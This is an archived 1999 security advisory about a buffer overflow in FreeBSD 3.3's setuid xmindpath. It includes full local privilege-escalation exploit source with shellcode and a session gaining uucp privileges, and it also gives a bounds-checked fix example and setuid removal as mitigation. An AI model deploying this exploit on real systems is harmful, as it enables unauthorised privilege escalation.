2nd Dec 1999 [SBWID-236]
COMMAND
	    /usr/X11R6/bin/xmindpath
SYSTEMS AFFECTED
	    FreeBSD 3.3
PROBLEM
	    Brock Tellier found the following.  It was tested on FreeBSD
	    3.3-RELEASE.  The program was installed with the default
	    permissions given when unpacked with sysinstall:
	
	        -rwsr-xr-x 1 uucp bin 7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath
	
	    /usr/X11R6/bin/xmindpath (suid uucp by default) contains a buffer
	    overflow which will allow any user to gain uucp privs.  Simply
	    enough:
	
	        xmindpath -f $BUF
	
	    See my "faxalter" advisory for more info on gaining root w/euid
	    uucp.  Exploit:
	
	        bash-2.03$ ls -la `which xmindpath`; id
	        -rwsr-xr-x 1 uucp bin 7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath
	        uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
	        bash-2.03$ ./xmindx
	        FreeBSD xmindpath exploit /path/to/xmindpath -f $RET
	        Brock Tellier [email protected]
	        Using addr: 0xbfbfcfa8
	        bash-2.03$ xmindpath -f $RET
	        lock open: File name too long
	        $ id
	        uid=1000(xnec) euid=66(uucp) gid=1000(xnec) groups=1000(xnec)
	        $
	
	    The code itself:
	
	    /*
	     *
	     * FreeBSD 3.3 xmindpath exploit gives euid uucp
	     * Compile: gcc -o xmindx xmindx.c
	     * Usage: ./xmindx <offset>  /path/to/xmindpath -f $RET
	     * Brock Tellier <[email protected]>
	     *
	     */
	    #include <stdlib.h>
	    #include <stdio.h>
	    #include <string.h>   /* memset, memcpy, strlen */
	    /* FreeBSD/i386 execve("/bin/sh") shellcode, free of NUL bytes */
	    char shell[]= /* [email protected] */
	    "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
	    "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
	    "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
	    "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
	    #define EGGLEN 2048   /* NOP sled + shellcode, exported as $EGG */
	    #define RETLEN 279    /* repeated return address, exported as $RET */
	    #define ALIGN 3       /* byte offset of the first address copy in ret[] */
	    #define NOP 0x90
	    int main(int argc, char *argv[]) {
	    long int offset=0;
	    int i;
	    int egglen = EGGLEN;
	    int retlen = RETLEN;
	    long int addr = 0xbfbfcfa8;   /* guessed address inside the NOP sled of $EGG */
	    char egg[EGGLEN];
	    char ret[RETLEN + 1];         /* +1 so the string can be NUL-terminated */
	    if (argc == 2) offset = atoi(argv[1]);
	    addr=addr + offset;
	    fprintf(stderr, "FreeBSD xmindpath exploit /path/to/xmindpath -f $RET\n");
	    fprintf(stderr, "Brock Tellier [email protected]\n");
	    fprintf(stderr, "Using addr: 0x%lx\n", addr);
	    /* egg: NOP sled with the shellcode at the end; the last byte is
	       left free for the NUL that putenv() requires */
	    memset(egg,NOP,egglen);
	    memcpy(egg+(egglen - strlen(shell) - 1),shell,strlen(shell));
	    egg[egglen - 1] = '\0';
	    /* ret: copies of addr starting at byte ALIGN; the "RET=" prefix
	       written below clobbers the first copy's low byte, which shifts
	       the value by ALIGN bytes so the copies line up with the saved
	       return address on the target's stack */
	    for(i=ALIGN;i< retlen;i+=4)
	    *(int *)&ret[i]=addr;
	    ret[retlen] = '\0';
	    memcpy(egg, "EGG=", 4);
	    putenv(egg);
	    memcpy(ret,"RET=",4);
	    putenv(ret);
	    /* spawn a shell that inherits $EGG and $RET; run the target from it */
	    system("/usr/local/bin/bash");
	    return 0;
	    }
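	    The bug class behind the one-line trigger above, as an added
	    illustration that is neither xmindpath's source (which is not on
	    this page) nor Brock Tellier's code: a command-line argument copied
	    into a fixed-size stack buffer with no length check, beside a
	    bounds-checked replacement.  The lock-file prefix, the 256-byte
	    buffer size and the function names are assumptions; the "lock open:
	    File name too long" message in the session is the only hint that
	    the -f argument feeds a lock-file path.

```c
/* Added illustration of the bug class, not xmindpath's source.  LOCKDIR,
 * LOCKBUF and the function names are assumptions made for this example. */
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define LOCKDIR  "/var/spool/lock/LCK.."   /* assumed lock-file prefix */
#define LOCKBUF  256                       /* assumed fixed buffer size */

/* Vulnerable pattern: strcpy/strcat into a fixed stack buffer.  A long
 * `dev` (the -f argument) writes past `name`; in a setuid program that
 * lets the caller overwrite the saved return address, which is exactly
 * what the $RET/$EGG exploit above relies on. */
void lock_name_unsafe(char name[LOCKBUF], const char *dev)
{
    strcpy(name, LOCKDIR);
    strcat(name, dev);          /* no bound on strlen(dev): overflow */
}

/* Hardened version: refuse names that do not fit and names that could
 * escape the lock directory.  Returns 0 on success, -1 with errno set. */
int lock_name_safe(char *name, size_t namelen, const char *dev)
{
    int n;

    if (dev[0] == '\0' || strchr(dev, '/') != NULL) {
        errno = EINVAL;         /* empty name or path traversal */
        return -1;
    }
    n = snprintf(name, namelen, "%s%s", LOCKDIR, dev);
    if (n < 0 || (size_t)n >= namelen) {
        errno = ENAMETOOLONG;   /* output would have been truncated */
        return -1;
    }
    return 0;
}

/* Feeds the hardened function an oversized -f argument (constructed
 * input, same order of size as the exploit's EGG) and reports whether
 * it was rejected with ENAMETOOLONG.  Returns 1 if rejected. */
int demo_reject_long_argument(void)
{
    char name[LOCKBUF];
    char attack[2048];

    memset(attack, 'A', sizeof attack - 1);
    attack[sizeof attack - 1] = '\0';
    return lock_name_safe(name, sizeof name, attack) == -1
        && errno == ENAMETOOLONG;
}

int main(void)
{
    char name[LOCKBUF];

    if (lock_name_safe(name, sizeof name, "cuaa0") == 0)
        printf("lock file: %s\n", name);
    printf("oversized -f argument rejected: %s\n",
           demo_reject_long_argument() ? "yes" : "no");
    /* lock_name_unsafe() is deliberately not called with the long
     * argument: it would corrupt this program's own stack. */
    return 0;
}
```

	    The check on the snprintf return value is the part that matters:
	    a silently truncated lock-file name would still be "safe" against
	    overflow but could collide with another device's lock, so the
	    hardened version rejects it outright, as the real program's "File
	    name too long" error suggests a fixed version should.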
	
SOLUTION
	    This one is a hole in vendor-provided third-party software that is
	    installed setuid uucp by default.  With ~2800 third-party apps
	    shipped with FreeBSD, you may expect this to happen.  Until a fixed
	    version is available, remove the setuid bit from
	    /usr/X11R6/bin/xmindpath (chmod u-s) or remove the program if it is
	    not needed: without the setuid bit the overflow runs with the
	    invoking user's own privileges and gains nothing.
	
